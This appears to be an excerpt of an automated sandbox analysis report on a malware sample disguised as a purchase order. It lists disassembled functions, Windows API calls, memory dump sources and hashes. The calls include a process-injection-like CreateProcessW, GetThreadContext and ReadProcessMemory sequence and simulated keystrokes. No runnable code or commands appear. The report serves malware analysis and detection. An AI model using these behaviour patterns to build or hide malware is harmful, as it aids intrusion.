                                                            • Opcode ID: c3b864f7d5b9120984dd7626daccb27e52648826fe1c65a593a8dc24c543694e
                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                            • Opcode Fuzzy Hash: c3b864f7d5b9120984dd7626daccb27e52648826fe1c65a593a8dc24c543694e
                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                            Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FreeInfoLibraryParametersSystem
                                                            • String ID:
                                                            • API String ID: 3403648963-0
                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                            Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                            Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                            Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00415012
                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2999321469-0
                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                            Function 03FA12E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA1AA3
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA1B39
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA1B5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction ID: 4158e5e485f7b58deead1930d70c724e06c576ac07fe48ec0a2041755893467c
                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction Fuzzy Hash: 3412DF24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A4E77A5F81CF5A
                                                            Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 63c79d87b9dc87b97f23904b0a68f9c22da550cee3fe5c848e33cb9bf205f94f
                                                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                            • Opcode Fuzzy Hash: 63c79d87b9dc87b97f23904b0a68f9c22da550cee3fe5c848e33cb9bf205f94f
                                                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                            Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                            Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92a4d35c9551d53168528b11f71eb67eb8de631cac32f1e54116781cc303ea96
                                                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                            • Opcode Fuzzy Hash: 92a4d35c9551d53168528b11f71eb67eb8de631cac32f1e54116781cc303ea96
                                                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                            Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __lock_file
                                                            • String ID:
                                                            • API String ID: 3031932315-0
                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                            Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                            Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                            Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                            Function 03FA22E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 03FA22F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 956bbe1db81e16d94294a84c94d5d809fcb3c8ad03b0b67bbff0d0335150efde
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 3EE0E67494020DEFDB00DFB8D54969D7BB4EF04301F1005A1FD01D2280D6309D508A72

                                                            Non-executed Functions

                                                            Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                            • GetKeyState.USER32(00000011), ref: 0047C92D
                                                            • GetKeyState.USER32(00000009), ref: 0047C936
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                            • GetKeyState.USER32(00000010), ref: 0047C953
                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                            • _wcsncpy.LIBCMT ref: 0047CA29
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                            • SendMessageW.USER32 ref: 0047CA7F
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                            • ImageList_SetDragCursorImage.COMCTL32(00A9FE80,00000000,00000000,00000000), ref: 0047CB9B
                                                            • ImageList_BeginDrag.COMCTL32(00A9FE80,00000000,000000F8,000000F0), ref: 0047CBAC
                                                            • SetCapture.USER32(?), ref: 0047CBB6
                                                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                            • ReleaseCapture.USER32 ref: 0047CC3A
                                                            • GetCursorPos.USER32(?), ref: 0047CC72
                                                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                            • SendMessageW.USER32 ref: 0047CD12
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                            • SendMessageW.USER32 ref: 0047CD80
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                            • GetCursorPos.USER32(?), ref: 0047CDC8
                                                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                            • GetParent.USER32(00000000), ref: 0047CDF7
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                            • SendMessageW.USER32 ref: 0047CE93
                                                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01A78,00000000,?,?,?,?), ref: 0047CF1C
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01A78,00000000,?,?,?,?), ref: 0047CFE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3100379633-4164748364
                                                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                            Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                            • IsIconic.USER32(?), ref: 0043444F
                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
